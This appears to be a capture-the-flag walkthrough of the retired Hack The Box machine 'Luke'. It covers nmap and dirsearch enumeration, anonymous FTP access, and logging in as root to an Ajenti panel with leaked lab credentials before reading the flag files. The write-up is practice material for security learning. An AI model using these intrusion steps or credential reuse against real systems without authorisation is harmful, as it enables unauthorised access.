Today we are going to solve the Hack The Box machine (HTB) which is retired. In that we are going to solve the machine LUKE.
First, we need to scan for open ports for the initial process to enumerate the information and we used most popular port scanning tool, nmap.
nmap -A 10.10.10.137
From the above image we found that 5 ports are open on the VM, which are port 21, 22, 80, 3000, 8000
And we can Observe Anonymous FTP Login is Allowed.
ftp 10.10.10.137
ftp> ls
We have a Successfully Login!
ls
Here we got webapp Directory.
ftp> cd webapp
ftp> ls
ftp> get for_Chihiro.txt
cat for_Chihiro.txt
We have entered the IP address which is 10.10.10.137 and we got the LUKE page.
Let’s check the site out with Dirbuster.
./dirsearch.py -u http://10.10.10.137 -e php -x 400, 403, 404
We will get -
/config.php
/management/
10.10.10.137/management we are not authorized for this
We found that a Nodejs service is running on port 3000. On browsing the IP address with 3000 port, we got a message i.e., Auth token is not supplied.
./dirsearch.py -u http://10.10.10.137:3000 -e php -x 400, 403, 404
Again we did a Brute Force on Port 3000 and we found 2 pages which are -
/login
/users
We have logged in the management page successfully using the credentials of user Derry.
User Name: Derry
Password: rZ86wwLvx7jUxtch
After we log in we can find files config.json, config.php and login.php. Among all config.json seems to be different.
config.json file has some Info related to ‘ajenti’ service running on port 8000 and we can observe a password in YELLOW Highlight i.e., KpMasng655EtTy9Z
Username: root
Password: KpMasng655EtTy9Z
This is the Dashboard of ajenti service. We will open a Terminal in this.
id
ls
cd home/
ls
cd derry
ls
cat user.txt
cd
ls
cd root
ls
cat root.txt
Luke HTB was an excellent machine with regards to enumeration and connecting the dots.
